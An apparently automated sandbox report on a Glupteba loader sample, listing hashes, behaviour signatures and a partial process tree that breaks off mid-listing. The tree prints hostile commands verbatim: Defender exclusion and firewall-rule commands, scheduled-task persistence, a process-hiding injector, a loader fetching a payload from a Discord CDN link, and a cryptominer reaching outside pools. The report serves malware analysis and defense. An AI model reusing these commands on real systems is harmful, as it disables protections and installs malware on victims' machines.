Analysis

  • max time kernel
    290s
  • max time network
    299s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04-02-2024 03:54

General

  • Target

    b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe

  • Size

    938KB

  • MD5

    668bbd74dce8327ef8c8f3db867bf0c5

  • SHA1

    7f5dda62660a333031b76d96e227866ad16afc75

  • SHA256

    b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58

  • SHA512

    652cb1c90ab38ee5f5e07e413113c340f36c8990f50264e0b4bdb67513cef485c02554e9544dd76d86c6d763c6e16cb3d71cd77a6607eb528198622f7d796f04

  • SSDEEP

    12288:XBHxXqjO+2Km0w36aqjMb5gjFyiHAoENT6PbBax7UqU3db98ySZXtW8EfNLPZTrN:RHxXwO+A/3U4MyXcwx7qtb9HSBQtPBp

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 17 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Windows security modification 2 TTPs 11 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 41 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • Creates scheduled task(s) 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe
    "C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe"
    1⤵
    • UAC bypass
    • Windows security bypass
    • Windows security modification
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:512
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\b7fc28f25a4aa0b3a8030419c4aa0f0004e15f67496c5c71fcebbe4b1b583f58.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4920
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      2⤵
      • Drops startup file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Users\Admin\Pictures\wCNxRm8unQtDHH5Uzd2KMJFJ.exe
        "C:\Users\Admin\Pictures\wCNxRm8unQtDHH5Uzd2KMJFJ.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3844
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 388
          4⤵
          • Program crash
          PID:360
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 360
          4⤵
          • Program crash
          PID:4916
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 400
          4⤵
          • Program crash
          PID:4324
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 616
          4⤵
          • Program crash
          PID:1540
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 660
          4⤵
          • Program crash
          PID:596
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 592
          4⤵
          • Program crash
          PID:168
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 708
          4⤵
          • Program crash
          PID:4424
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 696
          4⤵
          • Program crash
          PID:372
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 856
          4⤵
          • Program crash
          PID:608
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 820
          4⤵
          • Program crash
          PID:3944
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 852
          4⤵
          • Program crash
          PID:4788
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 844
          4⤵
          • Program crash
          PID:2484
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 816
          4⤵
          • Program crash
          PID:3952
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 884
          4⤵
          • Program crash
          PID:2308
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 660
          4⤵
          • Program crash
          PID:596
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 784
          4⤵
          • Program crash
          PID:4052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
            PID:684
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 772
            4⤵
            • Program crash
            PID:344
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 880
            4⤵
            • Program crash
            PID:4940
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 824
            4⤵
            • Program crash
            PID:4324
          • C:\Users\Admin\Pictures\wCNxRm8unQtDHH5Uzd2KMJFJ.exe
            "C:\Users\Admin\Pictures\wCNxRm8unQtDHH5Uzd2KMJFJ.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2928
            • C:\Windows\System32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:4228
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4916
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -nologo -noprofile
                5⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4388
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Manipulates WinMonFS driver.
                • Drops file in Windows directory
                • Suspicious use of AdjustPrivilegeToken
                PID:2404
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 396
                  6⤵
                  • Program crash
                  PID:2004
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 388
                  6⤵
                  • Program crash
                  PID:4940
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 424
                  6⤵
                  • Program crash
                  PID:2312
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 668
                  6⤵
                  • Program crash
                  PID:2220
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 732
                  6⤵
                  • Program crash
                  PID:2596
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 852
                  6⤵
                  • Program crash
                  PID:4832
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  6⤵
                    PID:3216
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 748
                    6⤵
                    • Program crash
                    PID:3448
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 700
                    6⤵
                    • Program crash
                    PID:364
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 624
                    6⤵
                    • Program crash
                    PID:5060
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    6⤵
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4656
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 828
                    6⤵
                      PID:4140
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /delete /tn ScheduledUpdate /f
                      6⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4188
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      6⤵
                      • Creates scheduled task(s)
                      PID:4492
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 876
                      6⤵
                        PID:2832
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 892
                        6⤵
                          PID:4052
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          6⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1580
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 904
                          6⤵
                            PID:3716
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1000
                            6⤵
                              PID:3680
                            • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                              C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                              6⤵
                              • Executes dropped EXE
                              PID:4216
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 844
                              6⤵
                                PID:4436
                              • C:\Windows\SYSTEM32\schtasks.exe
                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                6⤵
                                • Creates scheduled task(s)
                                PID:2188
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 952
                                6⤵
                                  PID:4788
                                • C:\Windows\windefender.exe
                                  "C:\Windows\windefender.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:528
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1052
                                  6⤵
                                    PID:4444
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                      7⤵
                                        PID:3316
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1100
                                      6⤵
                                        PID:4800
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1064
                                        6⤵
                                          PID:2988
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1064
                                          6⤵
                                            PID:1544
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1032
                                            6⤵
                                              PID:3976
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1128
                                              6⤵
                                                PID:3940
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1056
                                                6⤵
                                                  PID:3948
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1092
                                                  6⤵
                                                    PID:3680
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    6⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4508
                                                  • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
                                                    C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:1108
                                                    • C:\Windows\rss\csrss.exe
                                                      C:\Windows\rss\csrss.exe -hide 1472
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:4132
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 356
                                                        8⤵
                                                          PID:1624
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 336
                                                          8⤵
                                                            PID:1928
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 376
                                                            8⤵
                                                              PID:4800
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 600
                                                              8⤵
                                                                PID:4520
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 660
                                                                8⤵
                                                                  PID:2692
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 704
                                                                  8⤵
                                                                    PID:3040
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 672
                                                                    8⤵
                                                                      PID:4448
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 716
                                                                      8⤵
                                                                        PID:1332
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 804
                                                                        8⤵
                                                                          PID:4424
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -nologo -noprofile
                                                                          8⤵
                                                                            PID:4596
                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 38fde4c6-a5fa-4a5f-80c9-0ae51c1c77b0 --tls --nicehash -o showlock.net:443 --rig-id 38fde4c6-a5fa-4a5f-80c9-0ae51c1c77b0 --tls --nicehash -o showlock.net:80 --rig-id 38fde4c6-a5fa-4a5f-80c9-0ae51c1c77b0 --nicehash --http-port 3433 --http-access-token 38fde4c6-a5fa-4a5f-80c9-0ae51c1c77b0 --randomx-wrmsr=-1
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:1472
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        6⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:520
                                                                • C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe
                                                                  "C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe" --silent --allusers=0
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Enumerates connected drives
                                                                  • Modifies system certificate store
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:208
                                                                  • C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe
                                                                    C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e7e9558,0x6e7e9564,0x6e7e9570
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:4212
                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe" --version
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:2324
                                                                  • C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe
                                                                    "C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204035457" --session-guid=2ea6584e-37e6-4023-a79b-a82a001549c3 --server-tracking-blob=Zjk1YTVmMzU2YWNkNDI5NWE3MDI1MTU2YWQ5NTRlOWQzZGU2NjY5Y2Y3MDdjYThlY2I0OGFhNzIxNzBiMTQzNjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzAxODg5NS40NzI4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIzNDZmMjg4OC05NmZiLTQzNDQtODc4NC0xNDAyOTk3OTZlYTcifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5804000000000000
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:516
                                                                    • C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe
                                                                      C:\Users\Admin\Pictures\zYE5Cqp2QkcQb0Iv7Y5lKj5r.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6dad9558,0x6dad9564,0x6dad9570
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:3260
                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:4292
                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\assistant_installer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402040354571\assistant\assistant_installer.exe" --version
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:3724
                                                                • C:\Users\Admin\Pictures\ypOsv7wjxnCCOq5SxAdMRwp4.exe
                                                                  "C:\Users\Admin\Pictures\ypOsv7wjxnCCOq5SxAdMRwp4.exe"
                                                                  3⤵
                                                                    PID:4628
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 388
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5104
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 372
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:784
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 404
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:2640
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 660
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:4344
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 628
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:2328
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 708
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:428
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 696
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:3696
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 624
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:4052
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 784
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5072
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 832
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:1048
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 540
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:1356
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 796
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:520
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 796
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:1752
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 800
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:3036
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -nologo -noprofile
                                                                      4⤵
                                                                        PID:1860
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 772
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:4740
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 828
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:3756
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 772
                                                                        4⤵
                                                                        • Program crash
                                                                        PID:2456
                                                                      • C:\Users\Admin\Pictures\ypOsv7wjxnCCOq5SxAdMRwp4.exe
                                                                        "C:\Users\Admin\Pictures\ypOsv7wjxnCCOq5SxAdMRwp4.exe"
                                                                        4⤵
                                                                        • Windows security bypass
                                                                        • Executes dropped EXE
                                                                        • Windows security modification
                                                                        • Adds Run key to start application
                                                                        • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                        • Drops file in Windows directory
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:4772
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 360
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:4348
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 364
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:928
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 232
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:4692
                                                                        • C:\Windows\SysWOW64\WerFault.exe
